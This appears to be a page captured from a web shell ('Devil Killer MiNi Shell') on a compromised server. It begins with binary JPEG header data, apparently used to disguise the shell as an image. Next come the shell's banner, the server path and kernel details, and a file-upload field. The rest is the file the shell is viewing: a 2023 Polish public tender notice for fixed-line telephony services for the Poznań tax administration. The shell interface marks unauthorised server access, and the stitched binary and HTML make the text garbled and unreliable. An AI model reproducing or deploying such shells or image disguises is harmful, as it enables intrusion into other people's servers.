JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230405/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230405/0016557801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług telekomunikacyjnych w zakresie telefonii stacjonarnej dla Izby Administracji Skarbowej w Poznaniu oraz podległych jednostek na terenie województwa wielkopolskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Izba Administracji Skarbowej w Poznaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001022972</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dolna Wilda 80A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-501</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.ias.poznan@mf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wielkopolskie.kas.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług telekomunikacyjnych w zakresie telefonii stacjonarnej dla Izby Administracji Skarbowej w Poznaniu oraz podległych jednostek na terenie województwa wielkopolskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d74fc52c-d202-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00165578</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00149384/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Usługi telekomunikacyjne w zakresie telefonii stacjonarnej dla Izby Administracji Skarbowej w Poznaniu oraz podległych jednostek na terenie województwa wielkopolskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ias-poznan.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344) za pośrednictwem platformy zakupowej Marketplanet pod adresem https://ias-poznan.ezamawiajacy.pl . Korzystanie z Platformy jest bezpłatne.<br/>2. Komunikacja między Zamawiającym a wykonawcami, w szczególności składanie ofert oraz oświadczeń, pytań, wniosków, zawiadomień oraz przekazywanie informacji, odbywa się w formie elektronicznej wyłącznie za pośrednictwem Platformy. Za datę wpływu przyjmuje się datę ich wpływu na Platformę.<br/>3. Zamawiający informuje, że za pośrednictwem Platformy będzie przesyłać do wykonawców w szczególności wezwania do złożenia oświadczeń, wyjaśnień lub dokumentów, informacje o wyborze oferty najkorzystniejszej lub unieważnieniu postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Ogólne zasady korzystania z Platformy: <br/>1)	zgłoszenie do postępowania wymaga zalogowania wykonawcy do Systemu na subdomenie Izby Administracji Skarbowej w Poznaniu https://ias-poznan.ezamawiajacy.pl lub https://oneplace.marketplanet.pl; <br/>2)	wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta; <br/>3)	Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”;<br/>4)	proces rejestracji szczegółowo opisano w instrukcji dla wykonawcy umieszczonej w menu bocznym Platformy w zakładce „Baza Wiedzy/Plany zamówień publicznych”;<br/>5)	rejestracja wykonawcy trwa maksymalnie do 6 godzin roboczych. W związku z tym Zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w formie elektronicznej;<br/>6)	po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu. <br/>Komunikacja między Zamawiającym a wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem sekcji „Korespondencja”.<br/>2. Oferta oraz składane podmiotowe środki dowodowe wymagają podpisu/-ów osoby/osób uprawnionych do reprezentowania wykonawcy, w formie kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego osoby uprawnionej do reprezentowania wykonawcy.<br/>3. Wykonawca może zwracać się do Zamawiającego o wyjaśnienia dotyczące treści Specyfikacji Warunków Zamówienia (SWZ):<br/>1)	przed przystąpieniem do postępowania i bez konieczności logowania na Platformie Wykonawca ma możliwość wysłania do Zamawiającego wniosku o wyjaśnienie treści SWZ poprzez polecenie „Zadaj pytanie”,<br/>2)	po przystąpieniu do postępowania i zalogowaniu się przez Wykonawcę na Platformę w zakładce „Korespondencja”,<br/>3)	odpowiedź na pytanie zostanie udzielona do wiadomości publicznej i będzie widoczna w sekcji „Pytania i odpowiedzi”, z kolei dla zalogowanych użytkowników, którzy przystąpili do postępowania będzie widoczna w zakładce „Korespondencja”.<br/>4.	Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne, umożliwiające pracę na Platformie Zakupowej tj.:<br/>1)	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>3)	Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>4)	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>5.	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>6.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu, opisane zostały w Instrukcjach dla Wykonawcy zamieszczonych na Platformie pod adresem https://ias-poznan.ezamawiajacy.pl .<br/>7.	Informacje dotyczące odpowiedniego przygotowania stanowiska znajdują się na stronie: https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ochrona danych osobowych osób fizycznych i klauzula informacyjna z art. 13<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwane dalej „rozporządzeniem 2016/679”.<br/>1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, Zamawiający informuje, że:<br/>1) administratorem danych osobowych osób fizycznych jest Dyrektor Izby Administracji Skarbowej w Poznaniu, ul. Dolna Wilda 80A, 61-501 Poznań, (telefon nr: 61 8586100, adres e-mail: ias.poznan@mf.gov.pl) ;<br/>2) z inspektorem ochrony danych osobowych w Izbie Administracji Skarbowej w Poznaniu można skontaktować się pod numerem telefonu 61 8586173 lub adres e-mail: iod.poznan@mf.gov.pl;<br/>3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego 3001-ILZ.260.5.2023, prowadzonym w trybie podstawowym bez negocjacji;<br/>4) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia 2016/679;<br/>5) osoba fizyczna posiada:<br/>a) na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej dotyczących;<br/>b) na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;<br/>c) na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych osobowych, gdy osoba fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia 2016/679;<br/>6) osobie fizycznej nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679.<br/>2. Ograniczenia zasady jawności, o których mowa w art. 18 ust. 3-6 Pzp, stosuje się odpowiednio.<br/>3. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu, w tym również obowiązków wynikających z rozporządzenia 2016/679 w szczególności obowiązek informacyjny przewidziany w art. 13 rozporządzenia 2016/679 względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Obowiązek informacyjny wynikający z art. 13 rozporządzenia 2016/679 nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4 rozporządzenia 2016/679).<br/>4. Wykonawca jest obowiązany wypełnić obowiązek informacyjny wynikający z art. 14 rozporządzenia 2016/679 względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń o których mowa w art. 14 ust. 5 rozporządzenia 2016/679.<br/>5. Szczegółowe zasady dot. RODO zostały określone w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">3001-ILZ.260.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług telekomunikacyjnych w zakresie telefonii stacjonarnej dla Izby Administracji Skarbowej w Poznaniu oraz podległych jednostek na terenie województwa wielkopolskiego. <br/>2.	Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 3 i 4 do SWZ .<br/>3. Zamawiający nie dopuszcza składania ofert częściowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64210000-1 - Usługi telefoniczne i przesyłu danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający w trakcie realizacji zamówienia, w przypadku jednostek wymienionych <br/>w załączniku nr 4 do SWZ, których komunikacja odbywa się za pośrednictwem łącza SIP Trunk, przez serwer telekomunikacyjny Zamawiającego zlokalizowany w ZJS ul. Dolna Wilda 80A Poznań, zastrzega możliwość zwiększenia dostępnych ilości kanałów o dodatkowe 200 kanałów rozmownych (poz. 10 Formularza cenowego stanowiącego załącznik nr 2 do SWZ). 200 kanałów jest to maksymalna ilość, którą Zamawiający będzie mógł podzielić na jednostki w postaci dodatkowych pakietów przy założeniu, że 1 dodatkowy pakiet to 10 kanałów rozmownych SIP. Zamawiający, będzie mógł również całe 200 dodatkowych kanałów Sip Trunk (tj. 20 pakietów) przydzielić jednej jednostce. <br/>Wykonawca zapewni możliwość włączania i wyłączania dodatkowych pakietów w trakcie trwania umowy. W przypadku dodatkowych pakietów, Wykonawcy przysługuje wynagrodzenie za czas faktycznie świadczonej usługi od momentu jej uruchomienia do momentu wyłączenia wg stawek jednostkowych pakietu wynikających z oferty Wykonawcy. W przypadku nieskorzystania przez Zamawiającego z prawa opcji lub też niewykorzystania prawa opcji przez Zamawiającego w ilości wskazanej przez Zamawiającego (poz. 10 Formularza cenowego) Wykonawcy nie przysługuje żadne roszczenie z tego tytułu, w szczególności nie przysługuje mu prawo wezwania Zamawiającego do złożenia zamówienia uzupełniającego do ilości kanałów Sip Trunk wskazanych w niniejszym punkcie lub w Formularzu cenowym (poz. 10).<br/>2. Zamawiający zastrzega w poz. 5 Formularza cenowego stanowiącego załącznik nr 2 do SWZ prawo ewentualnego zwiększenia wielkości zamówienia podstawowego (tj. 456 abonamentów dla łącza SIP Trunk 10 kanałów) w ramach prawa opcji o dodatkowe 360 abonamentów dla łącza Sip Trunk 10 kanałów maksymalnie dla 15 jednostek wymienionych w załączniku nr 4 do SWZ, które nie posiadają aktualnie łącza Sip Trunk (1 łącze Sip Trunk 10 kanałów dla 1 jednostki). Zatem całkowitą wartość poz. 5 Formularza cenowego stanowiącego załącznik nr 2 do SWZ (łącznie 816 abonamentów) stanowi suma wartości zamówienia podstawowego i zamówienia, które zostanie ewentualnie udzielone przy wykorzystaniu prawa opcji. Miejscem lokalizacji łączy będzie Zespół Jednostek Skarbowych ul. Dolna Wilda 80 A, 61-501 Poznań. W przypadku dodania łącza Wykonawcy przysługuje wynagrodzenie za czas faktycznie świadczonej usługi dla tego łącza od momentu jego uruchomienia wg stawek jednostkowych wynikających z oferty Wykonawcy, odpowiednich dla tego typu łącza (poz. 5 Formularza cenowego). 15 jest to maksymalna ilość jednostek, dla których Zamawiający zamierza uruchomić łącze Sip Trunk i nie stanowi zobowiązania Zamawiającego do jego realizacji w pełnej ilości. Zamawiający w trakcie trwania umowy może utworzyć mniej łączy Sip Trunk, jak również może nie utworzyć żadnego. W przypadku nie skorzystania przez Zamawiającego z prawa opcji lub też nie wykorzystania prawa opcji przez Zamawiającego w ilości wskazanej przez Zamawiającego (tj. 360 abonamentów dla łącza SIP Trunk 10 kanałów) Wykonawcy nie przysługuje żadne roszczenie z tego tytułu., w szczególności nie przysługuje mu prawo wezwania Zamawiającego do złożenia zamówienia uzupełniającego do ilości abonamentów wskazanych w niniejszym punkcie lub w Formularzu cenowym. Ilość ta nie będzie wliczona do ogólnej liczby zmian, o której mowa w pkt. 34 OPZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający uzna ofertę za spełniającą wymagania wskazane w SWZ i przyjmie ją do szczegółowego rozpatrywania, jeżeli nie podlega ona odrzuceniu.<br/>2. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryterium oceny ofert oraz jego wagę z zastosowaniem poniższych zapisów:<br/>Kryterium „Cena” (C) – 100 (maksymalnie 100 pkt)<br/>Oferta w kryterium cena będzie punktowana zgodnie z poniższym wzorem:<br/>Cn<br/>---- X 100 = C<br/>Co<br/>Cn – najniższa cena brutto spośród ocenianych ofert<br/>Co – cena brutto oferty ocenianej<br/>3. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów w kryterium „Cena”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.	posiadania uprawnień do prowadzenia określonej działalności gospodarczej:<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący posiadania uprawnień do prowadzenia działalności telekomunikacyjnej, jeżeli wykonawca przedstawi aktualny wpis do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, wydanego na podstawie art. 11 w zw. z art. 10 ustawy z dnia 16 lipca 2004 r. – Prawo telekomunikacyjne (tj. Dz. U. z 2021 r. poz. 576 ze zm.). <br/> Ocena spełniania przedmiotowego warunku zostanie dokonana na podstawie:<br/>1)	oświadczenia wykonawcy o wpisie do rejestru ze wskazaniem numeru wpisu (wg wzoru stanowiącego załącznik nr 5 do SWZ). Oświadczenie wykonawcy zostanie zweryfikowane przez Zamawiającego na podstawie danych zawartych w ww. rejestrze.<br/>2)	zaświadczenia o wpisie do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej wydanego na podstawie art. 11 w zw. z art. 10 ustawy z dnia 16 lipca 2004 r. – Prawo telekomunikacyjne (tj. Dz. U. z 2021 r. poz. 576 ze zm.) – w przypadku gdy na podstawie danych zawartych w oświadczeniu, o którym mowa w pkt 1 nie będzie możliwe dokonanie przez Zamawiającego weryfikacji w ww. rejestrze posiadania przez wykonawcę wymaganych uprawnień.<br/><br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek dotyczący posiadania uprawnień do prowadzenia działalności telekomunikacyjnej musi spełniać każdy z wykonawców, który w ramach zamówienia świadczyć będzie usługi telekomunikacyjne.<br/><br/>2.	zdolności zawodowej (doświadczenia):<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący zdolności zawodowej (w zakresie doświadczenia) wówczas, gdy wykonawca wykonał bądź wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności gospodarczej jest krótszy – w tym okresie, co najmniej dwie usługi telekomunikacyjne w zakresie telefonii stacjonarnej dla abonentów (użytkowników końcowych) niebędących konsumentami o wartości minimum 100 000,00 PLN brutto każda, w ramach odrębnych umów. <br/>Wymagana przez Zamawiającego wartość usługi telekomunikacyjnej w zakresie telefonii stacjonarnej obejmuje opłaty abonamentowe (w tym także ewentualne koszty dodatkowych usług telekomunikacyjnych) oraz opłaty za wykonane połączenia (usługa świadczona dla odbiorcy 